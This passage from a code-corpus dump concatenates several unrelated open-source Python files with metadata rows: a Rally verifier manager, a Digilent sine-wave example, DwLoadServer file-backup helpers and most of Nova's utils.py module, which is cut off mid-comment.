if (not isinstance(args["concurrency"], int)
or args["concurrency"] < 0):
raise exceptions.ValidationError(
"'concurrency' argument should be a positive integer or "
"zero.")
if "load_list" in args:
if not isinstance(args["load_list"], list):
raise exceptions.ValidationError(
"'load_list' argument should be a list of tests.")
if "skip_list" in args:
if not isinstance(args["skip_list"], dict):
raise exceptions.ValidationError(
"'skip_list' argument should be a dict of tests "
"where keys are test names and values are reasons.")
if "xfail_list" in args:
if not isinstance(args["xfail_list"], dict):
raise exceptions.ValidationError(
"'xfail_list' argument should be a dict of tests "
"where keys are test names and values are reasons.")
def validate(self, run_args):
"""Validate a verifier context and run arguments."""
context.ContextManager.validate(self._meta_get("context"))
self.validate_args(run_args)
def _clone(self):
"""Clone a repo and switch to a certain version."""
source = self.verifier.source or self._meta_get("default_repo")
if not source or (
not URL_RE.match(source) and not os.path.exists(source)):
raise exceptions.RallyException("Source path '%s' is not valid."
% source)
if logging.is_debug():
LOG.debug("Cloning verifier repo from %s into %s."
% (source, self.repo_dir))
else:
LOG.info("Cloning verifier repo from %s." % source)
cmd = ["git", "clone", source, self.repo_dir]
default_version = self._meta_get("default_version")
if default_version and default_version != "master":
cmd.extend(["-b", default_version])
utils.check_output(cmd)
version = self.verifier.version
if version:
LOG.info("Switching verifier repo to the '%s' version." % version)
utils.check_output(["git", "checkout", version], cwd=self.repo_dir)
else:
output = utils.check_output(["git", "describe", "--all"],
cwd=self.repo_dir).strip()
if output.startswith("heads/"): # it is a branch
version = output[6:]
else:
head = utils.check_output(["git", "rev-parse", "HEAD"],
cwd=self.repo_dir).strip()
if output.endswith(head[:7]): # it is a commit ID
version = head
else: # it is a tag
version = output
self.verifier.update_properties(version=version)
def install(self):
"""Clone and install a verifier."""
utils.create_dir(self.base_dir)
self._clone()
if self.verifier.system_wide:
self.check_system_wide()
else:
self.install_venv()
def uninstall(self, full=False):
"""Uninstall a verifier.
:param full: If False (default behaviour), only deployment-specific
data will be removed
"""
path = self.base_dir if full else self.home_dir
if os.path.exists(path):
shutil.rmtree(path)
def install_venv(self):
"""Install a virtual environment for a verifier."""
if os.path.exists(self.venv_dir):
# NOTE(andreykurilin): It is necessary to remove the old env while
# performing update action.
LOG.info("Deleting old virtual environment.")
shutil.rmtree(self.venv_dir)
LOG.info("Creating virtual environment. It may take a few minutes.")
LOG.debug("Initializing virtual environment in %s directory."
% self.venv_dir)
utils.check_output(["virtualenv", "-p", sys.executable, self.venv_dir],
cwd=self.repo_dir,
msg_on_err="Failed to initialize virtual env "
"in %s directory." % self.venv_dir)
LOG.debug("Installing verifier in virtual environment.")
# NOTE(ylobankov): Use 'develop mode' installation to provide an
# ability to advanced users to change tests or
# develop new ones in verifier repo on the fly.
utils.check_output(["pip", "install", "-e", "./"],
cwd=self.repo_dir, env=self.environ)
def check_system_wide(self, reqs_file_path=None):
"""Check that all required verifier packages are installed."""
LOG.debug("Checking system-wide packages for verifier.")
reqs_file_path = reqs_file_path or os.path.join(self.repo_dir,
"requirements.txt")
with open(reqs_file_path) as f:
required_packages = [
p for p in f.read().split("\n")
if p.strip() and not p.startswith("#")
]
try:
pkg_resources.require(required_packages)
except (pkg_resources.DistributionNotFound,
pkg_resources.VersionConflict) as e:
raise VerifierSetupFailure(e.report(), verifier=self.verifier.name)
def checkout(self, version):
"""Switch a verifier repo."""
LOG.info("Switching verifier repo to the '%s' version." % version)
utils.check_output(["git", "checkout", "master"], cwd=self.repo_dir)
utils.check_output(["git", "remote", "update"], cwd=self.repo_dir)
utils.check_output(["git", "pull"], cwd=self.repo_dir)
utils.check_output(["git", "checkout", version], cwd=self.repo_dir)
def configure(self, extra_options=None):
"""Configure a verifier.
:param extra_options: a dictionary with external verifier specific
options for configuration.
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
configuration
"""
raise NotImplementedError(
"'%s' verifiers don't support configuration at all."
% self.get_name())
def is_configured(self):
"""Check whether a verifier is configured or not."""
return True
def get_configuration(self):
"""Get verifier configuration (e.g., the config file content)."""
return ""
def override_configuration(self, new_configuration):
"""Override verifier configuration.
:param new_configuration: Content which should be used while overriding
existing configuration
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
configuration
"""
raise NotImplementedError(
"'%s' verifiers don't support configuration at all."
% self.get_name())
def extend_configuration(self, extra_options):
"""Extend verifier configuration with new options.
:param extra_options: Options to be used for extending configuration
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
configuration
"""
raise NotImplementedError(
"'%s' verifiers don't support configuration at all."
% self.get_name())
def install_extension(self, source, version=None, extra_settings=None):
"""Install a verifier extension.
:param source: Path or URL to the repo to clone verifier extension from
:param version: Branch, tag or commit ID to checkout before verifier
extension installation
:param extra_settings: Extra installation settings for verifier
extension
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
extensions
"""
raise NotImplementedError(
"'%s' verifiers don't support extensions." % self.get_name())
def list_extensions(self):
"""List all verifier extensions.
Every extension is a dict object which contains
name and entry_point keys. example:
{
"name": p.name,
"entry_point": p.entry_point_target
}
"""
return []
def uninstall_extension(self, name):
"""Uninstall a verifier extension.
:param name: Name of extension to uninstall
:raises NotImplementedError: This feature is verifier-specific, so you
should override this method in your plugin if it supports
extensions
"""
raise NotImplementedError(
"'%s' verifiers don't support extensions." % self.get_name())
@abc.abstractmethod
def list_tests(self, pattern=""):
"""List all verifier tests.
:param pattern: Filter tests by given pattern
"""
def parse_results(self, results_data):
"""Parse subunit results data of a test run."""
# TODO(andreykurilin): Support more formats.
return subunit_v2.parse(io.StringIO(results_data))
@abc.abstractmethod
def run(self, context):
"""Run verifier tests.
Verification Component API expects that this method should return an
object. There is no special class, you do it as you want, but it should
have the following properties:
.. code-block:: none
<object>.totals = {
"tests_count": <total tests count>,
"tests_duration": <total tests duration>,
"failures": <total count of failed tests>,
"skipped": <total count of skipped tests>,
"success": <total count of successful tests>,
"unexpected_success":
<total count of unexpected successful tests>,
"expected_failures": <total count of expected failed tests>
}
<object>.tests = {
<test_id>: {
"status": <test status>,
"name": <test name>,
"duration": <test duration>,
"reason": <reason>, # optional
"traceback": <traceback> # optional
},
...
}
"""
| apache-2.0 | 5,558,008,805,250,458,000 | 38.214953 | 79 | 0.575608 | false |
andrasfuchs/BioBalanceDetector | Measurements/WaveForms/Experiments/SleepLogging/python/AnalogOut_Sine.py | 1 | 1355 | """
DWF Python Example
Author: Digilent, Inc.
Revision: 2018-07-19
Requires:
Python 2.7, 3
"""
from ctypes import *
import time
from dwfconstants import *
import sys
if sys.platform.startswith("win"):
dwf = cdll.dwf
elif sys.platform.startswith("darwin"):
dwf = cdll.LoadLibrary("/Library/Frameworks/dwf.framework/dwf")
else:
dwf = cdll.LoadLibrary("libdwf.so")
hdwf = c_int()
channel = c_int(0)
version = create_string_buffer(16)
dwf.FDwfGetVersion(version)
print("DWF Version: "+str(version.value))
dwf.FDwfParamSet(DwfParamOnClose, c_int(0)) # 0 = run, 1 = stop, 2 = shutdown
#open device
print("Opening first device...")
dwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))
if hdwf.value == hdwfNone.value:
print("failed to open device")
quit()
dwf.FDwfAnalogOutNodeEnableSet(hdwf, channel, AnalogOutNodeCarrier, c_bool(True))
dwf.FDwfAnalogOutNodeFunctionSet(hdwf, channel, AnalogOutNodeCarrier, funcSine)
dwf.FDwfAnalogOutNodeFrequencySet(hdwf, channel, AnalogOutNodeCarrier, c_double(10000))
dwf.FDwfAnalogOutNodeAmplitudeSet(hdwf, channel, AnalogOutNodeCarrier, c_double(1.41))
dwf.FDwfAnalogOutNodeOffsetSet(hdwf, channel, AnalogOutNodeCarrier, c_double(1.41))
print("Generating sine wave...")
dwf.FDwfAnalogOutConfigure(hdwf, channel, c_bool(True))
dwf.FDwfDeviceClose(hdwf)
| gpl-3.0 | 3,638,763,380,392,265,000 | 26.653061 | 87 | 0.727675 | false |
6809/DwLoadServer | dwload_server/utils/file_tools.py | 1 | 2410 | # encoding:utf-8
"""
DwLoadServer - A DWLOAD server written in Python
================================================
:created: 2014 by Jens Diemer - www.jensdiemer.de
:copyleft: 2014 by the DwLoadServer team, see AUTHORS for more details.
:license: GNU GPL v3 or above, see LICENSE for more details.
"""
import fnmatch
import logging
import os
import time
log = logging.getLogger(__name__)
def padding(data, size, b=b"\x00"):
quanta, leftover = divmod(len(data), size)
# Pad the last quantum with zero bits if necessary
if leftover:
data += (b * (size - leftover))
return data
def fnmatch_case_insensitve(filename, pattern):
return fnmatch.fnmatch(filename.upper(), pattern.upper())
def fnmatch_case_insensitve2(filename, patterns):
for pattern in patterns:
if fnmatch.fnmatch(filename.upper(), pattern.upper()):
return True
return False
def backup_rename(filepath):
"""
    Rename *filepath* if it is an existing file, by appending its last modified time to the filename.
:param filepath: source file that should be renamed
"""
if os.path.isfile(filepath):
log.info("Create a backup of the old %r", filepath)
mtime = os.path.getmtime(filepath)
mtime = time.localtime(mtime)
bak_filepath = filepath + time.strftime("-%Y%m%d-%H%M%S")
if not os.path.isfile(bak_filepath + ".bak"):
bak_filepath += ".bak"
else:
count = 1
while os.path.isfile(bak_filepath + "-%01i.bak" % count):
count += 1
bak_filepath += "-%01i.bak" % count
os.rename(filepath, bak_filepath)
log.info("Backup as: %r", bak_filepath)
def rename_with_backup(old_filepath, new_filepath):
backup_rename(new_filepath)
log.info("Rename %r to %r", old_filepath, new_filepath)
os.rename(old_filepath, new_filepath)
if __name__ == '__main__':
from dragonlib.utils.logging_utils import setup_logging
setup_logging(
level=1 # hardcore debug ;)
# level=10 # DEBUG
# level=20 # INFO
# level=30 # WARNING
# level=40 # ERROR
# level=50 # CRITICAL/FATAL
# level=99
)
filepath = os.path.expanduser("~/dwload-files/AUTOLOAD.DWL")
backup_rename(filepath)
backup_rename(filepath)
backup_rename(filepath) | gpl-3.0 | 1,362,518,961,651,157,200 | 26.397727 | 87 | 0.604979 | false |
blueboxgroup/nova | nova/utils.py | 1 | 40394 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities and helper functions."""
import contextlib
import datetime
import functools
import hashlib
import hmac
import inspect
import os
import pyclbr
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from xml.sax import saxutils
import eventlet
import netaddr
from oslo_concurrency import lockutils
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import timeutils
import six
from nova import exception
from nova.i18n import _, _LE, _LW
notify_decorator = 'nova.notifications.notify_decorator'
monkey_patch_opts = [
cfg.BoolOpt('monkey_patch',
default=False,
help='Whether to log monkey patching'),
cfg.ListOpt('monkey_patch_modules',
default=[
'nova.api.ec2.cloud:%s' % (notify_decorator),
'nova.compute.api:%s' % (notify_decorator)
],
help='List of modules/decorators to monkey patch'),
]
utils_opts = [
cfg.IntOpt('password_length',
default=12,
help='Length of generated instance admin passwords'),
cfg.StrOpt('instance_usage_audit_period',
default='month',
help='Time period to generate instance usages for. '
'Time period must be hour, day, month or year'),
cfg.StrOpt('rootwrap_config',
default="/etc/nova/rootwrap.conf",
help='Path to the rootwrap configuration file to use for '
'running commands as root'),
cfg.StrOpt('tempdir',
help='Explicitly specify the temporary working directory'),
]
""" This group is for very specific reasons.
If you're:
- Working around an issue in a system tool (e.g. libvirt or qemu) where the fix
is in flight/discussed in that community.
- The tool can be/is fixed in some distributions and rather than patch the code
those distributions can trivially set a config option to get the "correct"
behavior.
This is a good place for your workaround.
Please use with care!
Document the BugID that your workaround is paired with."""
workarounds_opts = [
cfg.BoolOpt('disable_rootwrap',
default=False,
help='This option allows a fallback to sudo for performance '
'reasons. For example see '
'https://bugs.launchpad.net/nova/+bug/1415106'),
cfg.BoolOpt('disable_libvirt_livesnapshot',
default=True,
                help='When using libvirt 1.2.2, live snapshots fail '
                     'intermittently under load. This config option provides '
                     'a mechanism to disable live snapshots while this is '
'resolved. See '
'https://bugs.launchpad.net/nova/+bug/1334398'),
cfg.BoolOpt('destroy_after_evacuate',
default=True,
help='Whether to destroy instances on startup when we suspect '
'they have previously been evacuated. This can result in '
'data loss if undesired. See '
'https://launchpad.net/bugs/1419785'),
]
CONF = cfg.CONF
CONF.register_opts(monkey_patch_opts)
CONF.register_opts(utils_opts)
CONF.import_opt('network_api_class', 'nova.network')
CONF.register_opts(workarounds_opts, group='workarounds')
LOG = logging.getLogger(__name__)
# used in limits
TIME_UNITS = {
'SECOND': 1,
'MINUTE': 60,
'HOUR': 3600,
'DAY': 86400
}
_IS_NEUTRON = None
synchronized = lockutils.synchronized_with_prefix('nova-')
SM_IMAGE_PROP_PREFIX = "image_"
SM_INHERITABLE_KEYS = (
'min_ram', 'min_disk', 'disk_format', 'container_format',
)
def vpn_ping(address, port, timeout=0.05, session_id=None):
"""Sends a vpn negotiation packet and returns the server session.
Returns Boolean indicating whether the vpn_server is listening.
Basic packet structure is below.
Client packet (14 bytes)::
0 1 8 9 13
+-+--------+-----+
|x| cli_id |?????|
+-+--------+-----+
x = packet identifier 0x38
cli_id = 64 bit identifier
? = unknown, probably flags/padding
Server packet (26 bytes)::
0 1 8 9 13 14 21 2225
+-+--------+-----+--------+----+
|x| srv_id |?????| cli_id |????|
+-+--------+-----+--------+----+
x = packet identifier 0x40
cli_id = 64 bit identifier
? = unknown, probably flags/padding
bit 9 was 1 and the rest were 0 in testing
"""
# NOTE(tonyb) session_id isn't used for a real VPN connection so using a
# cryptographically weak value is fine.
if session_id is None:
session_id = random.randint(0, 0xffffffffffffffff)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = struct.pack('!BQxxxxx', 0x38, session_id)
sock.sendto(data, (address, port))
sock.settimeout(timeout)
try:
received = sock.recv(2048)
except socket.timeout:
return False
finally:
sock.close()
fmt = '!BQxxxxxQxxxx'
if len(received) != struct.calcsize(fmt):
LOG.warning(_LW('Expected to receive %(exp)s bytes, '
'but actually %(act)s'),
dict(exp=struct.calcsize(fmt), act=len(received)))
return False
(identifier, server_sess, client_sess) = struct.unpack(fmt, received)
return (identifier == 0x40 and client_sess == session_id)
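# The struct formats used above match the packet sizes documented in the
# vpn_ping() docstring; a quick check (illustrative, standard library only):
#
#     >>> import struct
#     >>> struct.calcsize('!BQxxxxx')       # client packet: 1 + 8 + 5 pad bytes
#     14
#     >>> struct.calcsize('!BQxxxxxQxxxx')  # server packet: 1 + 8 + 5 + 8 + 4
#     26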
def _get_root_helper():
if CONF.workarounds.disable_rootwrap:
cmd = 'sudo'
else:
cmd = 'sudo nova-rootwrap %s' % CONF.rootwrap_config
return cmd
def execute(*cmd, **kwargs):
"""Convenience wrapper around oslo's execute() method."""
if 'run_as_root' in kwargs and 'root_helper' not in kwargs:
kwargs['root_helper'] = _get_root_helper()
return processutils.execute(*cmd, **kwargs)
def ssh_execute(dest, *cmd, **kwargs):
"""Convenience wrapper to execute ssh command."""
ssh_cmd = ['ssh', '-o', 'BatchMode=yes']
ssh_cmd.append(dest)
ssh_cmd.extend(cmd)
return execute(*ssh_cmd, **kwargs)
def trycmd(*args, **kwargs):
"""Convenience wrapper around oslo's trycmd() method."""
if 'run_as_root' in kwargs and 'root_helper' not in kwargs:
kwargs['root_helper'] = _get_root_helper()
return processutils.trycmd(*args, **kwargs)
def novadir():
import nova
return os.path.abspath(nova.__file__).split('nova/__init__.py')[0]
def generate_uid(topic, size=8):
characters = '01234567890abcdefghijklmnopqrstuvwxyz'
choices = [random.choice(characters) for _x in xrange(size)]
return '%s-%s' % (topic, ''.join(choices))
# Default symbols to use for passwords. Avoids visually confusing characters.
# ~6 bits per symbol
DEFAULT_PASSWORD_SYMBOLS = ('23456789', # Removed: 0,1
'ABCDEFGHJKLMNPQRSTUVWXYZ', # Removed: I, O
'abcdefghijkmnopqrstuvwxyz') # Removed: l
# ~5 bits per symbol
EASIER_PASSWORD_SYMBOLS = ('23456789', # Removed: 0, 1
'ABCDEFGHJKLMNPQRSTUVWXYZ') # Removed: I, O
def last_completed_audit_period(unit=None, before=None):
"""This method gives you the most recently *completed* audit period.
arguments:
            unit: string, one of 'hour', 'day', 'month', 'year'
Periods normally begin at the beginning (UTC) of the
period unit (So a 'day' period begins at midnight UTC,
a 'month' unit on the 1st, a 'year' on Jan, 1)
unit string may be appended with an optional offset
like so: 'day@18' This will begin the period at 18:00
UTC. 'month@15' starts a monthly period on the 15th,
and year@3 begins a yearly one on March 1st.
before: Give the audit period most recently completed before
<timestamp>. Defaults to now.
returns: 2 tuple of datetimes (begin, end)
The begin timestamp of this audit period is the same as the
end of the previous.
"""
if not unit:
unit = CONF.instance_usage_audit_period
offset = 0
if '@' in unit:
unit, offset = unit.split("@", 1)
offset = int(offset)
if before is not None:
rightnow = before
else:
rightnow = timeutils.utcnow()
if unit not in ('month', 'day', 'year', 'hour'):
raise ValueError('Time period must be hour, day, month or year')
if unit == 'month':
if offset == 0:
offset = 1
end = datetime.datetime(day=offset,
month=rightnow.month,
year=rightnow.year)
if end >= rightnow:
year = rightnow.year
if 1 >= rightnow.month:
year -= 1
month = 12 + (rightnow.month - 1)
else:
month = rightnow.month - 1
end = datetime.datetime(day=offset,
month=month,
year=year)
year = end.year
if 1 >= end.month:
year -= 1
month = 12 + (end.month - 1)
else:
month = end.month - 1
begin = datetime.datetime(day=offset, month=month, year=year)
elif unit == 'year':
if offset == 0:
offset = 1
end = datetime.datetime(day=1, month=offset, year=rightnow.year)
if end >= rightnow:
end = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 1)
begin = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 2)
else:
begin = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 1)
elif unit == 'day':
end = datetime.datetime(hour=offset,
day=rightnow.day,
month=rightnow.month,
year=rightnow.year)
if end >= rightnow:
end = end - datetime.timedelta(days=1)
begin = end - datetime.timedelta(days=1)
elif unit == 'hour':
end = rightnow.replace(minute=offset, second=0, microsecond=0)
if end >= rightnow:
end = end - datetime.timedelta(hours=1)
begin = end - datetime.timedelta(hours=1)
return (begin, end)
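# Worked example (illustrative): with unit='day@18' and a current time of
# 2015-03-10 12:00 UTC, last_completed_audit_period() returns
#
#     (datetime(2015, 3, 8, 18, 0), datetime(2015, 3, 9, 18, 0))
#
# because the period that would end at 2015-03-10 18:00 is still in progress.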
def generate_password(length=None, symbolgroups=DEFAULT_PASSWORD_SYMBOLS):
"""Generate a random password from the supplied symbol groups.
At least one symbol from each group will be included. Unpredictable
results if length is less than the number of symbol groups.
Believed to be reasonably secure (with a reasonable password length!)
"""
if length is None:
length = CONF.password_length
r = random.SystemRandom()
# NOTE(jerdfelt): Some password policies require at least one character
# from each group of symbols, so start off with one random character
# from each symbol group
password = [r.choice(s) for s in symbolgroups]
# If length < len(symbolgroups), the leading characters will only
# be from the first length groups. Try our best to not be predictable
# by shuffling and then truncating.
r.shuffle(password)
password = password[:length]
length -= len(password)
# then fill with random characters from all symbol groups
symbols = ''.join(symbolgroups)
password.extend([r.choice(symbols) for _i in xrange(length)])
# finally shuffle to ensure first x characters aren't from a
# predictable group
r.shuffle(password)
return ''.join(password)
def get_my_linklocal(interface):
try:
if_str = execute('ip', '-f', 'inet6', '-o', 'addr', 'show', interface)
condition = '\s+inet6\s+([0-9a-f:]+)/\d+\s+scope\s+link'
links = [re.search(condition, x) for x in if_str[0].split('\n')]
address = [w.group(1) for w in links if w is not None]
if address[0] is not None:
return address[0]
else:
msg = _('Link Local address is not found.:%s') % if_str
raise exception.NovaException(msg)
except Exception as ex:
msg = _("Couldn't get Link Local IP of %(interface)s"
" :%(ex)s") % {'interface': interface, 'ex': ex}
raise exception.NovaException(msg)
def xhtml_escape(value):
"""Escapes a string so it is valid within XML or XHTML.
"""
return saxutils.escape(value, {'"': '"', "'": '''})
def utf8(value):
"""Try to turn a string into utf-8 if possible.
Code is directly from the utf8 function in
http://github.com/facebook/tornado/blob/master/tornado/escape.py
"""
if isinstance(value, unicode):
return value.encode('utf-8')
assert isinstance(value, str)
return value
def check_isinstance(obj, cls):
"""Checks that obj is of type cls, and lets PyLint infer types."""
if isinstance(obj, cls):
return obj
raise Exception(_('Expected object of type: %s') % (str(cls)))
def parse_server_string(server_str):
"""Parses the given server_string and returns a tuple of host and port.
If it's not a combination of host part and port, the port element
is an empty string. If the input is invalid expression, return a tuple of
two empty strings.
"""
try:
# First of all, exclude pure IPv6 address (w/o port).
if netaddr.valid_ipv6(server_str):
return (server_str, '')
# Next, check if this is IPv6 address with a port number combination.
if server_str.find("]:") != -1:
(address, port) = server_str.replace('[', '', 1).split(']:')
return (address, port)
# Third, check if this is a combination of an address and a port
if server_str.find(':') == -1:
return (server_str, '')
# This must be a combination of an address and a port
(address, port) = server_str.split(':')
return (address, port)
except (ValueError, netaddr.AddrFormatError):
LOG.error(_LE('Invalid server_string: %s'), server_str)
return ('', '')
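# Illustrative calls for parse_server_string():
#
#     parse_server_string('192.168.1.1:8080')   # -> ('192.168.1.1', '8080')
#     parse_server_string('[2001:db8::1]:80')   # -> ('2001:db8::1', '80')
#     parse_server_string('2001:db8::1')        # -> ('2001:db8::1', '')
#     parse_server_string('not:a:valid:input')  # -> ('', '') and an error is logged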
def is_valid_ipv6_cidr(address):
try:
netaddr.IPNetwork(address, version=6).cidr
return True
except (TypeError, netaddr.AddrFormatError):
return False
def get_shortened_ipv6(address):
addr = netaddr.IPAddress(address, version=6)
return str(addr.ipv6())
def get_shortened_ipv6_cidr(address):
net = netaddr.IPNetwork(address, version=6)
return str(net.cidr)
def is_valid_cidr(address):
"""Check if address is valid
The provided address can be a IPv6 or a IPv4
CIDR address.
"""
try:
# Validate the correct CIDR Address
netaddr.IPNetwork(address)
except netaddr.AddrFormatError:
return False
# Prior validation partially verify /xx part
# Verify it here
ip_segment = address.split('/')
if (len(ip_segment) <= 1 or
ip_segment[1] == ''):
return False
return True
def get_ip_version(network):
"""Returns the IP version of a network (IPv4 or IPv6).
Raises AddrFormatError if invalid network.
"""
if netaddr.IPNetwork(network).version == 6:
return "IPv6"
elif netaddr.IPNetwork(network).version == 4:
return "IPv4"
def safe_ip_format(ip):
"""Transform ip string to "safe" format.
Will return ipv4 addresses unchanged, but will nest ipv6 addresses
inside square brackets.
"""
try:
if netaddr.IPAddress(ip).version == 6:
return '[%s]' % ip
except (TypeError, netaddr.AddrFormatError): # hostname
pass
# it's IPv4 or hostname
return ip
def monkey_patch():
"""If the CONF.monkey_patch set as True,
this function patches a decorator
for all functions in specified modules.
You can set decorators for each modules
using CONF.monkey_patch_modules.
The format is "Module path:Decorator function".
Example:
'nova.api.ec2.cloud:nova.notifications.notify_decorator'
Parameters of the decorator is as follows.
(See nova.notifications.notify_decorator)
name - name of the function
function - object of the function
"""
    # If CONF.monkey_patch is not True, this function does nothing.
if not CONF.monkey_patch:
return
# Get list of modules and decorators
for module_and_decorator in CONF.monkey_patch_modules:
module, decorator_name = module_and_decorator.split(':')
# import decorator function
decorator = importutils.import_class(decorator_name)
__import__(module)
# Retrieve module information using pyclbr
module_data = pyclbr.readmodule_ex(module)
for key in module_data.keys():
# set the decorator for the class methods
if isinstance(module_data[key], pyclbr.Class):
clz = importutils.import_class("%s.%s" % (module, key))
for method, func in inspect.getmembers(clz, inspect.ismethod):
setattr(clz, method,
decorator("%s.%s.%s" % (module, key, method), func))
# set the decorator for the function
if isinstance(module_data[key], pyclbr.Function):
func = importutils.import_class("%s.%s" % (module, key))
setattr(sys.modules[module], key,
decorator("%s.%s" % (module, key), func))
def convert_to_list_dict(lst, label):
"""Convert a value or list into a list of dicts."""
if not lst:
return None
if not isinstance(lst, list):
lst = [lst]
return [{label: x} for x in lst]
def make_dev_path(dev, partition=None, base='/dev'):
"""Return a path to a particular device.
>>> make_dev_path('xvdc')
/dev/xvdc
>>> make_dev_path('xvdc', 1)
/dev/xvdc1
"""
path = os.path.join(base, dev)
if partition:
path += str(partition)
return path
def sanitize_hostname(hostname):
"""Return a hostname which conforms to RFC-952 and RFC-1123 specs."""
if isinstance(hostname, unicode):
hostname = hostname.encode('latin-1', 'ignore')
hostname = re.sub('[ _]', '-', hostname)
hostname = re.sub('[^\w.-]+', '', hostname)
hostname = hostname.lower()
hostname = hostname.strip('.-')
return hostname
def read_cached_file(filename, cache_info, reload_func=None):
"""Read from a file if it has been modified.
:param cache_info: dictionary to hold opaque cache.
:param reload_func: optional function to be called with data when
file is reloaded due to a modification.
:returns: data from file
"""
mtime = os.path.getmtime(filename)
if not cache_info or mtime != cache_info.get('mtime'):
LOG.debug("Reloading cached file %s", filename)
with open(filename) as fap:
cache_info['data'] = fap.read()
cache_info['mtime'] = mtime
if reload_func:
reload_func(cache_info['data'])
return cache_info['data']
@contextlib.contextmanager
def temporary_mutation(obj, **kwargs):
"""Temporarily set the attr on a particular object to a given value then
revert when finished.
One use of this is to temporarily set the read_deleted flag on a context
object:
with temporary_mutation(context, read_deleted="yes"):
do_something_that_needed_deleted_objects()
"""
def is_dict_like(thing):
return hasattr(thing, 'has_key')
def get(thing, attr, default):
if is_dict_like(thing):
return thing.get(attr, default)
else:
return getattr(thing, attr, default)
def set_value(thing, attr, val):
if is_dict_like(thing):
thing[attr] = val
else:
setattr(thing, attr, val)
def delete(thing, attr):
if is_dict_like(thing):
del thing[attr]
else:
delattr(thing, attr)
NOT_PRESENT = object()
old_values = {}
for attr, new_value in kwargs.items():
old_values[attr] = get(obj, attr, NOT_PRESENT)
set_value(obj, attr, new_value)
try:
yield
finally:
for attr, old_value in old_values.items():
if old_value is NOT_PRESENT:
delete(obj, attr)
else:
set_value(obj, attr, old_value)
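# Illustrative usage (editor's sketch): the helper accepts both dict-like and
# attribute-style objects, so a plain dict works for demonstration purposes.
#
#   >>> ctx = {'read_deleted': 'no'}
#   >>> with temporary_mutation(ctx, read_deleted='yes'):
#   ...     ctx['read_deleted']               # 'yes' inside the block
#   'yes'
#   >>> ctx['read_deleted']                   # restored on exit
#   'no'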
def generate_mac_address():
"""Generate an Ethernet MAC address."""
# NOTE(vish): We would prefer to use 0xfe here to ensure that linux
# bridge mac addresses don't change, but it appears to
# conflict with libvirt, so we use the next highest octet
# that has the unicast and locally administered bits set
# properly: 0xfa.
# Discussion: https://bugs.launchpad.net/nova/+bug/921838
mac = [0xfa, 0x16, 0x3e,
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)]
return ':'.join(map(lambda x: "%02x" % x, mac))
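# Example output (illustrative): the OUI prefix is fixed and the last three
# octets are random, e.g. 'fa:16:3e:4b:a9:07'.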
def read_file_as_root(file_path):
"""Secure helper to read file as root."""
try:
out, _err = execute('cat', file_path, run_as_root=True)
return out
except processutils.ProcessExecutionError:
raise exception.FileNotFound(file_path=file_path)
@contextlib.contextmanager
def temporary_chown(path, owner_uid=None):
"""Temporarily chown a path.
:param owner_uid: UID of temporary owner (defaults to current user)
"""
if owner_uid is None:
owner_uid = os.getuid()
orig_uid = os.stat(path).st_uid
if orig_uid != owner_uid:
execute('chown', owner_uid, path, run_as_root=True)
try:
yield
finally:
if orig_uid != owner_uid:
execute('chown', orig_uid, path, run_as_root=True)
@contextlib.contextmanager
def tempdir(**kwargs):
argdict = kwargs.copy()
if 'dir' not in argdict:
argdict['dir'] = CONF.tempdir
tmpdir = tempfile.mkdtemp(**argdict)
try:
yield tmpdir
finally:
try:
shutil.rmtree(tmpdir)
except OSError as e:
LOG.error(_LE('Could not remove tmpdir: %s'), e)
def walk_class_hierarchy(clazz, encountered=None):
"""Walk class hierarchy, yielding most derived classes first."""
if not encountered:
encountered = []
for subclass in clazz.__subclasses__():
if subclass not in encountered:
encountered.append(subclass)
# drill down to leaves first
for subsubclass in walk_class_hierarchy(subclass, encountered):
yield subsubclass
yield subclass
class UndoManager(object):
"""Provides a mechanism to facilitate rolling back a series of actions
when an exception is raised.
"""
def __init__(self):
self.undo_stack = []
def undo_with(self, undo_func):
self.undo_stack.append(undo_func)
def _rollback(self):
for undo_func in reversed(self.undo_stack):
undo_func()
def rollback_and_reraise(self, msg=None, **kwargs):
"""Rollback a series of actions then re-raise the exception.
.. note:: (sirp) This should only be called within an
exception handler.
"""
with excutils.save_and_reraise_exception():
if msg:
LOG.exception(msg, **kwargs)
self._rollback()
def mkfs(fs, path, label=None, run_as_root=False):
"""Format a file or block device
:param fs: Filesystem type (examples include 'swap', 'ext3', 'ext4'
'btrfs', etc.)
:param path: Path to file or block device to format
:param label: Volume label to use
"""
if fs == 'swap':
args = ['mkswap']
else:
args = ['mkfs', '-t', fs]
# add -F to force no interactive execute on non-block device.
if fs in ('ext3', 'ext4', 'ntfs'):
args.extend(['-F'])
if label:
if fs in ('msdos', 'vfat'):
label_opt = '-n'
else:
label_opt = '-L'
args.extend([label_opt, label])
args.append(path)
execute(*args, run_as_root=run_as_root)
def last_bytes(file_like_object, num):
"""Return num bytes from the end of the file, and remaining byte count.
:param file_like_object: The file to read
:param num: The number of bytes to return
:returns (data, remaining)
"""
try:
file_like_object.seek(-num, os.SEEK_END)
except IOError as e:
if e.errno == 22:
file_like_object.seek(0, os.SEEK_SET)
else:
raise
remaining = file_like_object.tell()
return (file_like_object.read(), remaining)
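# Illustrative usage (editor's sketch; the file below is hypothetical): for a
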